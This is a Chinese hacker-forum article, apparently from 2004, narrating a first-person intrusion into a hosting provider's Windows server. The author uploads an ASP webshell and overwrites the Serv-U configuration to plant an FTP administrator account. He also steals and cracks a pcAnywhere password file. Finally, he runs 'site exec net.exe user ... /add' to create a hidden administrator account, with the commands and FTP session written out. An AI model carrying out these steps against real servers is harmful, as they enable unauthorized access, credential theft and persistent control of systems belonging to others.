您的位置:首页网络冲浪黑客天空 → 最近的一次渗透

最近的一次渗透

时间:2004/10/8 16:39:00来源:本站整理作者:蓝点我要评论(0)







最近的一次渗透
半夜2点多了,在和QQ上一个好友聊天,也不知道怎么的叫我测试他的空间商的服务器是不是安全,二话不说先发个 海阳木马上去

1,初战告捷

打开IE 输入 http://domain.com/mail.asp (mail.asp是我给木马改的名字),习惯的先输入密码,和我想的一样,服务器禁止了FSO!!没办法退回来,看看能不能浏览目录,c:\ 发送命令 ,good~~ 居然可以

C:\Documents and Settings-----0
C:\Inetpub-----0
C:\Program Files-----0
C:\WINNT-----0

C:\Inetpub 没删 看看scripts映射有没有删掉,http://ip/scripts,返回404,删掉了管理员还不错,但没有取消分区的everyone的所有权限让他的服务器受到致命的打击!

在ie 输入 <A href=&quotftp://ip/&quot; target=_blank><FONT color=#163498&gtftp://ip&lt;/FONT> 返回 serv-u 什么不能匿名登陆,不过这个已经够了,确认了他的ftp服务器段用的什么软件,找吧,一般serv-u会装在C:\Program Files ,C:\Program Files 发送命令 ,没有:(,d:\ 发送命令 看到D:\Program Files,肯定就在里面我心里想,果然看到了D:\Program Files\Serv-u,谢天谢地!接下来我需要获得ServUDaemon.ini这个文件,海阳木马提供了copy 功能
D:\Program Files\Serv-u\ServUDaemon.ini copy E:\www\我的朋友的目录\
发送命令
Great ~~ 显示 command completed success 成功
在ie 输入 http://domain.com/ServUDaemon.ini 把ServUDaemon.ini down下来了
接着把ServUDaemon.ini 拷贝到 本地机的serv-u里,(我的电脑上安装了serv-u,你如果没有安装一个,在肉鸡上下载文件也很方便),打开 serviadmin ,你就会看到 肉鸡上的ftp用户了,不过 这些用户的口令是加密!不管他我们要获得是管理员,添加一个用户,把他添加成管理员,保存!把这个新的ServUDaemon.ini 发给我朋友,叫他用ftp上传,覆盖掉原来web目录里的
ok~~接下来没他的事了!!:)

D:\Program Files\Serv-u\ServUDaemon.ini  move  E:\www\我的朋友的目录\bbs
command completed success
(注意:这里一定要先移除掉 ServUDaemon.ini 海阳木马不会自动覆盖)

D:\Program Files\Serv-u\ 看看ServUDaemon.ini 是不是移除了,确实没有了

E:\www\我的朋友的目录\ServUDaemon.ini   copy  D:\Program Files\Serv-u\

command completed success

到这里只要服务器重起,我们就获得了ftp的管理员权限,可以通过本地机的servu 远程连接 肉鸡上的 servu !渗透基本成功

2,意外的发现

弄了半天,我还没扫描过他的服务器,不要弄出什么弱口令什么的,前面做的可真是笑话!:) 当然扫描结果没有这些,却意外的发现了5631 5632 端口,呵呵~~直到是什么的吗?pcanywhere的,去吧pcanywhere的密码文件down 下来,用流光看密码^o^ ,一般pcanywhere的密码文件都是放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere  目录,PCA.*****.cif
这个文件就是了

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.23212.cif  copy  E:\www\我的朋友的目录\

http://domain.com/PCA.23212.cif

用流光读取了密码,顺利的连上了肉鸡,当然肉鸡是锁定的,不然可以直接装后门了!

但最大的收获,pcanywhere可以重起服务器,哈哈哈!我现在是ftp的管理员了
远程连上肉鸡的servu,创建了一个naxin的用户,添加了 主目录 指向d:\www 并添加c d e f 分区的映射,全部权限!现在我控制着服务器的生杀大权,虽然不是系统管理员,但可以通过ftp删除文件,嘎嘎嘎~~ 然而我发现ftp只能用port模式连接,在后面的渗透埋下了阴影

3,最后的胜利

入侵者有着强烈的控制欲,我当然不会甘心只得到ftp的管理员,我要的是系统管理员!

用过serv-u的应该看到有个执行权限吧!嗬嗬用它就可以来添加管理员,具体命令

shell>ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): id
331 User name okay, please send complete E-mail address as password.
Password:password
230 User logged in, proceed.
ftp> cd winnt
250 Directory changed to /WINNT
ftp>cd system32
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cnaxin$ 123 /add
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cnaxin$ /add

哈哈哈!完成了!!

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 黑客大战直播网址 黑客

最新文章 黑客大战直播网址 黑客什么是木马,什么是木马 计算机病毒是指什么什么是木马,什么是木马病毒黑客破解密码常用的方法告诉你黑客的Google搜索技巧

人气排行 如何攻击局域网电脑无线网络密码破解教程(破解无线路由WEP加密网站获得系统权限攻击教程流光破解ftp密码教程计算机病毒是指什么黑客破解密码常用的方法如何命令行/DOS下列出进程名与进程文件路径2010黑客工具